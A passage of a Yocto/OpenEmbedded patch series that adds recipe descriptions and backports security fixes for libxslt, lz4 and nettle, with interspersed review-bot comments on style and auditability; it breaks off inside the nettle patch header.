+index cc5ed044..16671d45 100644
+--- a/src/ptrace/_UPT_get_dyn_info_list_addr.c
++++ b/src/ptrace/_UPT_get_dyn_info_list_addr.c
+@@ -71,6 +71,11 @@ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
+
+ #else
+
++/* XXX fix me: there is currently no way to locate the dyn-info list
++ by a remote unwinder. On ia64, this is done via a special
++ unwind-table entry. Perhaps something similar can be done with
++ DWARF2 unwind info. */
++
+ static inline int
+ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
+ int *countp)
+diff --git a/src/sh/Ginit.c b/src/sh/Ginit.c
+index 52988a72..9fe96d2b 100644
+--- a/src/sh/Ginit.c
++++ b/src/sh/Ginit.c
+@@ -58,13 +58,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -75,7 +68,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/tilegx/Ginit.c b/src/tilegx/Ginit.c
+index 7564a558..925e6413 100644
+--- a/src/tilegx/Ginit.c
++++ b/src/tilegx/Ginit.c
+@@ -64,13 +64,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -81,7 +74,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) (intptr_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/x86/Ginit.c b/src/x86/Ginit.c
+index f6b8dc27..3cec74a2 100644
+--- a/src/x86/Ginit.c
++++ b/src/x86/Ginit.c
+@@ -54,13 +54,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -71,7 +64,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/x86_64/Ginit.c b/src/x86_64/Ginit.c
+index b7e8e462..fe6bcc33 100644
+--- a/src/x86_64/Ginit.c
++++ b/src/x86_64/Ginit.c
+@@ -49,13 +49,6 @@ static struct unw_addr_space local_addr_space;
+
+ unw_addr_space_t unw_local_addr_space = &local_addr_space;
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -66,7 +59,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+--
+2.32.0
+
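Review bot: The added `// Access the ...` line in each get_dyn_info_list_addr is a C++-style comment in files that otherwise use `/* */` (see the `/* UNW_LOCAL_ONLY */` and `XXX fix me` comments in the same hunks), and it does not mention the new failure path. In the non-`UNW_LOCAL_ONLY` build the function now returns `-UNW_ENOINFO` when the weak `_U_dyn_info_list_addr` is unresolved, where the removed line always stored an address and returned 0. I would write the comment as `/* The dyn-info list lives in the local-only library (libunwind.so); if it is not linked, the weak symbol is null and -UNW_ENOINFO is returned above. */`. The same applies to every Ginit.c hunk in this patch; the ia64 and mi hunks start inside their functions, so the guard there is only partly visible.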
diff --git a/meta/recipes-support/libunwind/libunwind_1.3.1.bb b/meta/recipes-support/libunwind/libunwind_1.3.1.bb
index 037e04c3c0..8ae94a834c 100644
--- a/meta/recipes-support/libunwind/libunwind_1.3.1.bb
+++ b/meta/recipes-support/libunwind/libunwind_1.3.1.bb
@@ -7,6 +7,7 @@ SRC_URI = "http://download.savannah.nongnu.org/releases/libunwind/libunwind-${PV
file://0004-Fix-build-on-mips-musl.patch \
file://0005-ppc32-Consider-ucontext-mismatches-between-glibc-and.patch \
file://0006-Fix-for-X32.patch \
+ file://0001-Fix-compilation-with-fno-common.patch \
"
SRC_URI_append_libc-musl = " file://musl-header-conflict.patch"
diff --git a/meta/recipes-support/liburcu/liburcu_0.11.1.bb b/meta/recipes-support/liburcu/liburcu_0.11.1.bb
index 6a517e6f29..1902415c90 100644
--- a/meta/recipes-support/liburcu/liburcu_0.11.1.bb
+++ b/meta/recipes-support/liburcu/liburcu_0.11.1.bb
@@ -1,4 +1,7 @@
SUMMARY = "Userspace RCU (read-copy-update) library"
+DESCRIPTION = "A userspace RCU (read-copy-update) library. This data \
+synchronization library provides read-side access which scales linearly \
+with the number of cores. "
HOMEPAGE = "http://lttng.org/urcu"
BUGTRACKER = "http://lttng.org/project/issues"
diff --git a/meta/recipes-support/libusb/libusb1_1.0.22.bb b/meta/recipes-support/libusb/libusb1_1.0.22.bb
index 1d9d772575..ffa8f0320c 100644
--- a/meta/recipes-support/libusb/libusb1_1.0.22.bb
+++ b/meta/recipes-support/libusb/libusb1_1.0.22.bb
@@ -1,5 +1,7 @@
SUMMARY = "Userspace library to access USB (version 1.0)"
-HOMEPAGE = "http://libusb.sf.net"
+DESCRIPTION = "A cross-platform library to access USB devices from Linux, \
+macOS, Windows, OpenBSD/NetBSD, Haiku and Solaris userspace."
+HOMEPAGE = "https://libusb.info"
BUGTRACKER = "http://www.libusb.org/report"
SECTION = "libs"
@@ -8,7 +10,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=fbc093901857fcd118f065f900982c24"
BBCLASSEXTEND = "native nativesdk"
-SRC_URI = "${SOURCEFORGE_MIRROR}/libusb/libusb-${PV}.tar.bz2 \
+SRC_URI = "https://github.com/libusb/libusb/releases/download/v${PV}/libusb-${PV}.tar.bz2 \
file://no-dll.patch \
file://run-ptest \
"
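Review bot: The tarball origin moves from `${SOURCEFORGE_MIRROR}` to a GitHub release URL, but the hunk does not show the `SRC_URI` checksum lines, so a reader cannot tell that the fetched archive is still the one previously verified. If the checksums further down the recipe are unchanged, the fetcher will reject a differing archive, and saying so next to the URL makes the change auditable: `# Same release archive as the former SourceForge download; SRC_URI checksums unchanged.` Any upstream-version-check setting that still points at the old host would also need updating; none is visible in this hunk.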
diff --git a/meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch b/meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch
new file mode 100644
index 0000000000..614047ea7a
--- /dev/null
+++ b/meta/recipes-support/libxslt/libxslt/CVE-2021-30560.patch
@@ -0,0 +1,201 @@
+From 50f9c9cd3b7dfe9b3c8c795247752d1fdcadcac8 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 12 Jun 2021 20:02:53 +0200
+Subject: [PATCH] Fix use-after-free in xsltApplyTemplates
+
+xsltApplyTemplates without a select expression could delete nodes in
+the source document.
+
+1. Text nodes with strippable whitespace
+
+Whitespace from input documents is already stripped, so there's no
+need to strip it again. Under certain circumstances, xsltApplyTemplates
+could be fooled into deleting text nodes that are still referenced,
+resulting in a use-after-free.
+
+2. The DTD
+
+The DTD was only unlinked, but there's no good reason to do this just
+now. Maybe it was meant as a micro-optimization.
+
+3. Unknown nodes
+
+Useless and dangerous as well, especially with XInclude nodes.
+See https://gitlab.gnome.org/GNOME/libxml2/-/issues/268
+
+Simply stop trying to uselessly delete nodes when applying a template.
+This part of the code is probably a leftover from a time where
+xsltApplyStripSpaces wasn't implemented yet. Also note that
+xsltApplyTemplates with a select expression never tried to delete
+nodes.
+
+Also stop xsltDefaultProcessOneNode from deleting nodes for the same
+reasons.
+
+This fixes CVE-2021-30560.
+
+CVE: CVE-2021-30560
+Upstream-Status: Backport [https://github.com/GNOME/libxslt/commit/50f9c9cd3b7dfe9b3c8c795247752d1fdcadcac8.patch]
+Comment: No change in any hunk
+Signed-off-by: Omkar Patil <Omkar.Patil@kpit.com>
+
+---
+ libxslt/transform.c | 119 +++-----------------------------------------
+ 1 file changed, 7 insertions(+), 112 deletions(-)
+
+diff --git a/libxslt/transform.c b/libxslt/transform.c
+index 04522154..3aba354f 100644
+--- a/libxslt/transform.c
++++ b/libxslt/transform.c
+@@ -1895,7 +1895,7 @@ static void
+ xsltDefaultProcessOneNode(xsltTransformContextPtr ctxt, xmlNodePtr node,
+ xsltStackElemPtr params) {
+ xmlNodePtr copy;
+- xmlNodePtr delete = NULL, cur;
++ xmlNodePtr cur;
+ int nbchild = 0, oldSize;
+ int childno = 0, oldPos;
+ xsltTemplatePtr template;
+@@ -1968,54 +1968,13 @@ xsltDefaultProcessOneNode(xsltTransformContextPtr ctxt, xmlNodePtr node,
+ return;
+ }
+ /*
+- * Handling of Elements: first pass, cleanup and counting
++ * Handling of Elements: first pass, counting
+ */
+ cur = node->children;
+ while (cur != NULL) {
+- switch (cur->type) {
+- case XML_TEXT_NODE:
+- case XML_CDATA_SECTION_NODE:
+- case XML_DOCUMENT_NODE:
+- case XML_HTML_DOCUMENT_NODE:
+- case XML_ELEMENT_NODE:
+- case XML_PI_NODE:
+- case XML_COMMENT_NODE:
+- nbchild++;
+- break;
+- case XML_DTD_NODE:
+- /* Unlink the DTD, it's still reachable using doc->intSubset */
+- if (cur->next != NULL)
+- cur->next->prev = cur->prev;
+- if (cur->prev != NULL)
+- cur->prev->next = cur->next;
+- break;
+- default:
+-#ifdef WITH_XSLT_DEBUG_PROCESS
+- XSLT_TRACE(ctxt,XSLT_TRACE_PROCESS_NODE,xsltGenericDebug(xsltGenericDebugContext,
+- "xsltDefaultProcessOneNode: skipping node type %d\n",
+- cur->type));
+-#endif
+- delete = cur;
+- }
++ if (IS_XSLT_REAL_NODE(cur))
++ nbchild++;
+ cur = cur->next;
+- if (delete != NULL) {
+-#ifdef WITH_XSLT_DEBUG_PROCESS
+- XSLT_TRACE(ctxt,XSLT_TRACE_PROCESS_NODE,xsltGenericDebug(xsltGenericDebugContext,
+- "xsltDefaultProcessOneNode: removing ignorable blank node\n"));
+-#endif
+- xmlUnlinkNode(delete);
+- xmlFreeNode(delete);
+- delete = NULL;
+- }
+- }
+- if (delete != NULL) {
+-#ifdef WITH_XSLT_DEBUG_PROCESS
+- XSLT_TRACE(ctxt,XSLT_TRACE_PROCESS_NODE,xsltGenericDebug(xsltGenericDebugContext,
+- "xsltDefaultProcessOneNode: removing ignorable blank node\n"));
+-#endif
+- xmlUnlinkNode(delete);
+- xmlFreeNode(delete);
+- delete = NULL;
+ }
+
+ /*
+@@ -4864,7 +4823,7 @@ xsltApplyTemplates(xsltTransformContextPtr ctxt, xmlNodePtr node,
+ xsltStylePreCompPtr comp = (xsltStylePreCompPtr) castedComp;
+ #endif
+ int i;
+- xmlNodePtr cur, delNode = NULL, oldContextNode;
++ xmlNodePtr cur, oldContextNode;
+ xmlNodeSetPtr list = NULL, oldList;
+ xsltStackElemPtr withParams = NULL;
+ int oldXPProximityPosition, oldXPContextSize;
+@@ -4998,73 +4957,9 @@ xsltApplyTemplates(xsltTransformContextPtr ctxt, xmlNodePtr node,
+ else
+ cur = NULL;
+ while (cur != NULL) {
+- switch (cur->type) {
+- case XML_TEXT_NODE:
+- if ((IS_BLANK_NODE(cur)) &&
+- (cur->parent != NULL) &&
+- (cur->parent->type == XML_ELEMENT_NODE) &&
+- (ctxt->style->stripSpaces != NULL)) {
+- const xmlChar *val;
+-
+- if (cur->parent->ns != NULL) {
+- val = (const xmlChar *)
+- xmlHashLookup2(ctxt->style->stripSpaces,
+- cur->parent->name,
+- cur->parent->ns->href);
+- if (val == NULL) {
+- val = (const xmlChar *)
+- xmlHashLookup2(ctxt->style->stripSpaces,
+- BAD_CAST "*",
+- cur->parent->ns->href);
+- }
+- } else {
+- val = (const xmlChar *)
+- xmlHashLookup2(ctxt->style->stripSpaces,
+- cur->parent->name, NULL);
+- }
+- if ((val != NULL) &&
+- (xmlStrEqual(val, (xmlChar *) "strip"))) {
+- delNode = cur;
+- break;
+- }
+- }
+- /* Intentional fall-through */
+- case XML_ELEMENT_NODE:
+- case XML_DOCUMENT_NODE:
+- case XML_HTML_DOCUMENT_NODE:
+- case XML_CDATA_SECTION_NODE:
+- case XML_PI_NODE:
+- case XML_COMMENT_NODE:
+- xmlXPathNodeSetAddUnique(list, cur);
+- break;
+- case XML_DTD_NODE:
+- /* Unlink the DTD, it's still reachable
+- * using doc->intSubset */
+- if (cur->next != NULL)
+- cur->next->prev = cur->prev;
+- if (cur->prev != NULL)
+- cur->prev->next = cur->next;
+- break;
+- case XML_NAMESPACE_DECL:
+- break;
+- default:
+-#ifdef WITH_XSLT_DEBUG_PROCESS
+- XSLT_TRACE(ctxt,XSLT_TRACE_APPLY_TEMPLATES,xsltGenericDebug(xsltGenericDebugContext,
+- "xsltApplyTemplates: skipping cur type %d\n",
+- cur->type));
+-#endif
+- delNode = cur;
+- }
++ if (IS_XSLT_REAL_NODE(cur))
++ xmlXPathNodeSetAddUnique(list, cur);
+ cur = cur->next;
+- if (delNode != NULL) {
+-#ifdef WITH_XSLT_DEBUG_PROCESS
+- XSLT_TRACE(ctxt,XSLT_TRACE_APPLY_TEMPLATES,xsltGenericDebug(xsltGenericDebugContext,
+- "xsltApplyTemplates: removing ignorable blank cur\n"));
+-#endif
+- xmlUnlinkNode(delNode);
+- xmlFreeNode(delNode);
+- delNode = NULL;
+- }
+ }
+ }
+
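Review bot: Nothing at the two rewritten loops records why they must no longer unlink or free nodes, so a later cleanup could reintroduce the pattern this patch removes. In xsltApplyTemplates the removed code queued `delNode` and called `xmlFreeNode` on source-tree nodes while walking the child list, which the commit message identifies as the use-after-free; the replacement only tests `IS_XSLT_REAL_NODE(cur)`, whose definition is outside the hunk. A one-line comment above each loop would capture the invariant, for example `/* Never unlink or free source-document nodes here; they may still be referenced (CVE-2021-30560). */`. Both functions start and end outside their hunks, and since the header states the backport is unchanged from upstream, the comment is better proposed upstream than carried locally.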
diff --git a/meta/recipes-support/libxslt/libxslt_1.1.34.bb b/meta/recipes-support/libxslt/libxslt_1.1.34.bb
index 1961bb5b31..4755677bec 100644
--- a/meta/recipes-support/libxslt/libxslt_1.1.34.bb
+++ b/meta/recipes-support/libxslt/libxslt_1.1.34.bb
@@ -1,4 +1,9 @@
SUMMARY = "GNOME XSLT library"
+DESCRIPTION = "libxslt is the XSLT C parser and toolkit developed for the Gnome project. \
+XSLT itself is a an XML language to define transformation for XML. Libxslt is based on \
+libxml2 the XML C library developed for the GNOME project. It also implements most of \
+the EXSLT set of processor-portable extensions functions and some of Saxon's evaluate \
+and expressions extensions."
HOMEPAGE = "http://xmlsoft.org/XSLT/"
BUGTRACKER = "https://bugzilla.gnome.org/"
@@ -9,6 +14,7 @@ SECTION = "libs"
DEPENDS = "libxml2"
SRC_URI = "http://xmlsoft.org/sources/libxslt-${PV}.tar.gz \
+ file://CVE-2021-30560.patch \
"
SRC_URI[md5sum] = "db8765c8d076f1b6caafd9f2542a304a"
@@ -16,6 +22,10 @@ SRC_URI[sha256sum] = "98b1bd46d6792925ad2dfe9a87452ea2adebf69dcb9919ffd55bf926a7
UPSTREAM_CHECK_REGEX = "libxslt-(?P<pver>\d+(\.\d+)+)\.tar"
+# We have libxml2 2.9.10 and we don't link statically with it anyway
+# so this isn't an issue.
+CVE_CHECK_WHITELIST += "CVE-2022-29824"
+
S = "${WORKDIR}/libxslt-${PV}"
BINCONFIG = "${bindir}/xslt-config"
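Review bot: The justification above `CVE_CHECK_WHITELIST += "CVE-2022-29824"` names only the libxml2 version, which does not by itself show the issue is fixed: the entry is safe only if libxml2 2.9.10 as built here carries the fix, and this hunk does not show that. Dynamic linking means libxslt need not be patched separately, but it still executes the libxml2 code at runtime, so the risk stays with whatever libxml2 is installed. I would reword the comment to name the actual mitigation, for example `# The flaw is in libxml2, which is linked dynamically; fixed by a backport in the libxml2 recipe.`, and confirm that backport exists before relying on the whitelist entry.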
diff --git a/meta/recipes-support/lz4/files/CVE-2021-3520.patch b/meta/recipes-support/lz4/files/CVE-2021-3520.patch
new file mode 100644
index 0000000000..5ac8f6691f
--- /dev/null
+++ b/meta/recipes-support/lz4/files/CVE-2021-3520.patch
@@ -0,0 +1,27 @@
+From 8301a21773ef61656225e264f4f06ae14462bca7 Mon Sep 17 00:00:00 2001
+From: Jasper Lievisse Adriaanse <j@jasper.la>
+Date: Fri, 26 Feb 2021 15:21:20 +0100
+Subject: [PATCH] Fix potential memory corruption with negative memmove() size
+
+Upstream-Status: Backport
+https://github.com/lz4/lz4/commit/8301a21773ef61656225e264f4f06ae14462bca7#diff-7055e9cf14c488aea9837aaf9f528b58ee3c22988d7d0d81d172ec62d94a88a7
+CVE: CVE-2021-3520
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ lib/lz4.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: git/lib/lz4.c
+===================================================================
+--- git.orig/lib/lz4.c
++++ git/lib/lz4.c
+@@ -1665,7 +1665,7 @@ LZ4_decompress_generic(
+ const size_t dictSize /* note : = 0 if noDict */
+ )
+ {
+- if (src == NULL) { return -1; }
++ if ((src == NULL) || (outputSize < 0)) { return -1; }
+
+ { const BYTE* ip = (const BYTE*) src;
+ const BYTE* const iend = ip + srcSize;
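Review bot: The patch header puts the upstream link on its own line under `Upstream-Status: Backport`, whereas the other backports added in this commit (libunwind, libxslt) use the bracketed one-line form; the nettle CVE-2021-20305-1.patch header that follows has the same layout. I would write it as `Upstream-Status: Backport [https://github.com/lz4/lz4/commit/8301a21773ef61656225e264f4f06ae14462bca7]` so that anyone auditing the CVE fix can trace it to the upstream commit from the tag alone. The guarded function, LZ4_decompress_generic, continues outside the hunk.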
diff --git a/meta/recipes-support/lz4/lz4_1.9.2.bb b/meta/recipes-support/lz4/lz4_1.9.2.bb
index 6510156ed0..bc11a57eb5 100644
--- a/meta/recipes-support/lz4/lz4_1.9.2.bb
+++ b/meta/recipes-support/lz4/lz4_1.9.2.bb
@@ -1,5 +1,6 @@
SUMMARY = "Extremely Fast Compression algorithm"
DESCRIPTION = "LZ4 is a very fast lossless compression algorithm, providing compression speed at 400 MB/s per core, scalable with multi-cores CPU. It also features an extremely fast decoder, with speed in multiple GB/s per core, typically reaching RAM speed limits on multi-core systems."
+HOMEPAGE = "https://github.com/lz4/lz4"
LICENSE = "BSD | BSD-2-Clause | GPL-2.0"
LIC_FILES_CHKSUM = "file://lib/LICENSE;md5=ebc2ea4814a64de7708f1571904b32cc \
@@ -11,8 +12,13 @@ PE = "1"
SRCREV = "fdf2ef5809ca875c454510610764d9125ef2ebbd"
-SRC_URI = "git://github.com/lz4/lz4.git \
+# remove at next version upgrade or when output changes
+PR = "r1"
+HASHEQUIV_HASH_VERSION .= ".1"
+
+SRC_URI = "git://github.com/lz4/lz4.git;branch=dev;protocol=https \
file://run-ptest \
+ file://CVE-2021-3520.patch \
"
UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>.*)"
@@ -21,7 +27,7 @@ S = "${WORKDIR}/git"
# Fixed in r118, which is larger than the current version.
CVE_CHECK_WHITELIST += "CVE-2014-4715"
-EXTRA_OEMAKE = "PREFIX=${prefix} CC='${CC}' DESTDIR=${D} LIBDIR=${libdir} INCLUDEDIR=${includedir} BUILD_STATIC=no"
+EXTRA_OEMAKE = "PREFIX=${prefix} CC='${CC}' CFLAGS='${CFLAGS}' DESTDIR=${D} LIBDIR=${libdir} INCLUDEDIR=${includedir} BUILD_STATIC=no"
do_install() {
oe_runmake install
diff --git a/meta/recipes-support/lzo/lzo_2.10.bb b/meta/recipes-support/lzo/lzo_2.10.bb
index 8eefec3cc9..f0c8631aea 100644
--- a/meta/recipes-support/lzo/lzo_2.10.bb
+++ b/meta/recipes-support/lzo/lzo_2.10.bb
@@ -1,4 +1,6 @@
SUMMARY = "Lossless data compression library"
+DESCRIPTION = "A portable lossless data compression library written in \
+ANSI C that offers pretty fast compression and *extremely* fast decompression. "
HOMEPAGE = "http://www.oberhumer.com/opensource/lzo/"
SECTION = "libs"
LICENSE = "GPLv2+"
@@ -16,6 +18,8 @@ SRC_URI[sha256sum] = "c0f892943208266f9b6543b3ae308fab6284c5c90e627931446fb49b42
inherit autotools ptest
+CVE_PRODUCT = "lzo oberhumer:lzo2"
+
EXTRA_OECONF = "--enable-shared"
do_install_ptest() {
diff --git a/meta/recipes-support/lzop/lzop_1.04.bb b/meta/recipes-support/lzop/lzop_1.04.bb
index b50c230437..59c2003b74 100644
--- a/meta/recipes-support/lzop/lzop_1.04.bb
+++ b/meta/recipes-support/lzop/lzop_1.04.bb
@@ -5,6 +5,7 @@ gzip are much higher compression and decompression speed at the cost of some \n\
compression ratio. The lzop compression utility was designed with the goals \n\
of reliability, speed, portability and with reasonable drop-in compatibility \n\
to gzip."
+HOMEPAGE = "http://www.lzop.org/"
DEPENDS += "lzo"
LICENSE = "GPLv2+"
diff --git a/meta/recipes-support/mpfr/mpfr_4.0.2.bb b/meta/recipes-support/mpfr/mpfr_4.0.2.bb
index 00c2dc2fe9..0ac73f031f 100644
--- a/meta/recipes-support/mpfr/mpfr_4.0.2.bb
+++ b/meta/recipes-support/mpfr/mpfr_4.0.2.bb
@@ -1,4 +1,5 @@
SUMMARY = "C library for multiple-precision floating-point computations with exact rounding"
+DESCRIPTION = "The GNU Multiple Precision Floating-Point Reliable Library (GNU MPFR) is a GNU portable C library for arbitrary-precision binary floating-point computation with correct rounding, based on GNU Multi-Precision Library. MPFR's computation is both efficient and has a well-defined semantics: the functions are completely specified on all the possible operands and the results do not depend on the platform."
HOMEPAGE = "https://www.mpfr.org/"
LICENSE = "LGPLv3+"
SECTION = "devel"
diff --git a/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch
new file mode 100644
index 0000000000..cfc0f382fa
--- /dev/null
+++ b/meta/recipes-support/nettle/nettle-3.5.1/CVE-2021-20305-1.patch
@@ -0,0 +1,215 @@
+Backport of:
+
+From a63893791280d441c713293491da97c79c0950fe Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Niels=20M=C3=B6ller?= <nisse@lysator.liu.se>
+Date: Thu, 11 Mar 2021 19:37:41 +0100
+Subject: [PATCH] New functions ecc_mod_mul_canonical and
+ ecc_mod_sqr_canonical.
+
+* ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
+New functions.
+* ecc-internal.h: Declare and document new functions.
+* curve448-eh-to-x.c (curve448_eh_to_x): Use ecc_mod_sqr_canonical.
+* curve25519-eh-to-x.c (curve25519_eh_to_x): Use ecc_mod_mul_canonical.
+* ecc-eh-to-a.c (ecc_eh_to_a): Likewise.
+* ecc-j-to-a.c (ecc_j_to_a): Likewise.
+* ecc-mul-m.c (ecc_mul_m): Likewise.
+
+(cherry picked from commit 2bf497ba4d6acc6f352bca015837fad33008565c)
+
+Upstream-Status: Backport
+https://sources.debian.org/data/main/n/nettle/3.4.1-1%2Bdeb10u1/debian/patches/CVE-2021-20305-1.patch
+CVE: CVE-2021-20305 dep1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ ChangeLog | 11 +++++++++++
+ curve25519-eh-to-x.c | 6 +-----
+ curve448-eh-to-x.c | 5 +----
+ ecc-eh-to-a.c | 12 ++----------
+ ecc-internal.h | 15 +++++++++++++++
+ ecc-j-to-a.c | 15 +++------------
+ ecc-mod-arith.c | 24 ++++++++++++++++++++++++
+ ecc-mul-m.c | 6 ++----
+ 8 files changed, 59 insertions(+), 35 deletions(-)
+
+#diff --git a/ChangeLog b/ChangeLog
+#index fd138d82..5cc5c188 100644
+#--- a/ChangeLog
+#+++ b/ChangeLog
+#@@ -1,3 +1,14 @@
+#+2021-03-11 Niels Möller <nisse@lysator.liu.se>
+#+
+#+ * ecc-mod-arith.c (ecc_mod_mul_canonical, ecc_mod_sqr_canonical):
+#+ New functions.
+#+ * ecc-internal.h: Declare and document new functions.
+#+ * curve448-eh-to-x.c (curve448_eh_to_x): Use ecc_mod_sqr_canonical.
+#+ * curve25519-eh-to-x.c (curve25519_eh_to_x): Use ecc_mod_mul_canonical.
+#+ * ecc-eh-to-a.c (ecc_eh_to_a): Likewise.
+#+ * ecc-j-to-a.c (ecc_j_to_a): Likewise.
+#+ * ecc-mul-m.c (ecc_mul_m): Likewise.
+#+
+# 2021-02-17 Niels Möller <nisse@lysator.liu.se>
+#
+# * Released Nettle-3.7.1.
+Index: nettle-3.5.1/curve25519-eh-to-x.c
+===================================================================
+--- nettle-3.5.1.orig/curve25519-eh-to-x.c
++++ nettle-3.5.1/curve25519-eh-to-x.c
+@@ -53,7 +53,6 @@ curve25519_eh_to_x (mp_limb_t *xp, const
+ #define t2 (scratch + 2*ecc->p.size)
+
+ const struct ecc_curve *ecc = &_nettle_curve25519;
+- mp_limb_t cy;
+
+ /* If u = U/W and v = V/W are the coordiantes of the point on the
+ Edwards curve we get the curve25519 x coordinate as
+@@ -69,10 +68,7 @@ curve25519_eh_to_x (mp_limb_t *xp, const
+ ecc->p.invert (&ecc->p, t1, t0, t2 + ecc->p.size);
+
+ ecc_modp_add (ecc, t0, wp, vp);
+- ecc_modp_mul (ecc, t2, t0, t1);
+-
+- cy = mpn_sub_n (xp, t2, ecc->p.m, ecc->p.size);
+- cnd_copy (cy, xp, t2, ecc->p.size);
++ ecc_mod_mul_canonical (&ecc->p, xp, t0, t1, t2);
+ #undef vp
+ #undef wp
+ #undef t0
+Index: nettle-3.5.1/ecc-eh-to-a.c
+===================================================================
+--- nettle-3.5.1.orig/ecc-eh-to-a.c
++++ nettle-3.5.1/ecc-eh-to-a.c
+@@ -59,9 +59,7 @@ ecc_eh_to_a (const struct ecc_curve *ecc
+ /* Needs 2*size + scratch for the invert call. */
+ ecc->p.invert (&ecc->p, izp, zp, tp + ecc->p.size);
+
+- ecc_modp_mul (ecc, tp, xp, izp);
+- cy = mpn_sub_n (r, tp, ecc->p.m, ecc->p.size);
+- cnd_copy (cy, r, tp, ecc->p.size);
++ ecc_mod_mul_canonical (&ecc->p, r, xp, izp, tp);
+
+ if (op)
+ {
+@@ -81,7 +79,5 @@ ecc_eh_to_a (const struct ecc_curve *ecc
+ }
+ return;
+ }
+- ecc_modp_mul (ecc, tp, yp, izp);
+- cy = mpn_sub_n (r + ecc->p.size, tp, ecc->p.m, ecc->p.size);
+- cnd_copy (cy, r + ecc->p.size, tp, ecc->p.size);
++ ecc_mod_mul_canonical (&ecc->p, r + ecc->p.size, yp, izp, tp);
+ }
+Index: nettle-3.5.1/ecc-internal.h
+===================================================================
+--- nettle-3.5.1.orig/ecc-internal.h
++++ nettle-3.5.1/ecc-internal.h
+@@ -49,6 +49,8 @@
+ #define ecc_mod_submul_1 _nettle_ecc_mod_submul_1
+ #define ecc_mod_mul _nettle_ecc_mod_mul
+ #define ecc_mod_sqr _nettle_ecc_mod_sqr
++#define ecc_mod_mul_canonical _nettle_ecc_mod_mul_canonical
++#define ecc_mod_sqr_canonical _nettle_ecc_mod_sqr_canonical
+ #define ecc_mod_random _nettle_ecc_mod_random
